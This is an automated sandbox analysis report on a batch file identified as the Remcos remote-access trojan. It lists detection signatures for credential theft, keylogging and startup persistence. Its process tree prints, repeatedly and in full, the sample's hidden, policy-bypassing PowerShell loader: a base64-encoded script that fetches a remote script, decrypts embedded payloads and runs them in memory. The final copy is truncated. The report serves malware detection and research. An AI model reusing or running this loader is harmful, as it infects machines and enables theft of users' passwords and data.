Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tOpxHK0Z2U.bat

Overview

General Information

Sample name:tOpxHK0Z2U.bat
renamed because original name is a hash value
Original sample name:883fc875fce3e9a54f8eb6025c50560f800adc146d616422c2db1bb47b7cc5e4.bat
Analysis ID:1612239
MD5:890f45d950b48b371048ddce0b66790b
SHA1:f69a74cab519f7bcb5b41d81b0f908d44e4c6013
SHA256:883fc875fce3e9a54f8eb6025c50560f800adc146d616422c2db1bb47b7cc5e4
Tags:abokirem-duckdns-orgbatuser-JAMESWT_MHT
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains a sample name check
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Yara detected WebBrowserPassView password recovery tool
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7472 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tOpxHK0Z2U.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7560 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\tOpxHK0Z2U.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7612 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkdmFseGspLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRxenkgaW4gJG5zYnR1KSB7CWlmICgkcXp5LlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRrcmNmYT0kcXp5LlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRjZXpqbT1bc3RyaW5nW11dJGtyY2ZhLlNwbGl0KCdcJyk7SUVYICckdWltZXk9ZW11cnUgKHRibnhmIChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGNlemptWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHlseGFnPWVtdXJ1ICh0Ym54ZiAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRjZXpqbVsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtpbmZkZSAkdWltZXkgJG51bGw7aW5mZGUgJHlseGFnICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 7936 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\eguw" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 7944 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\gaaojdm" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 7964 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qunhkwxnio" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 8056 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_8b2957c5.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8136 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_8b2957c5.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4532 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkdmFseGspLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRxenkgaW4gJG5zYnR1KSB7CWlmICgkcXp5LlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRrcmNmYT0kcXp5LlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRjZXpqbT1bc3RyaW5nW11dJGtyY2ZhLlNwbGl0KCdcJyk7SUVYICckdWltZXk9ZW11cnUgKHRibnhmIChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGNlemptWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHlseGFnPWVtdXJ1ICh0Ym54ZiAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRjZXpqbVsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtpbmZkZSAkdWltZXkgJG51bGw7aW5mZGUgJHlseGFnICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 5560 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4f0470de.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6468 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4f0470de.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3376 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkdmFseGspLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRxenkgaW4gJG5zYnR1KSB7CWlmICgkcXp5LlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRrcmNmYT0kcXp5LlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRjZXpqbT1bc3RyaW5nW11dJGtyY2ZhLlNwbGl0KCdcJyk7SUVYICckdWltZXk9ZW11cnUgKHRibnhmIChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGNlemptWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHlseGFnPWVtdXJ1ICh0Ym54ZiAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRjZXpqbVsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtpbmZkZSAkdWltZXkgJG51bGw7aW5mZGUgJHlseGFnICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 7684 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4d1fbf4c.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 736 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4d1fbf4c.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3656 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3R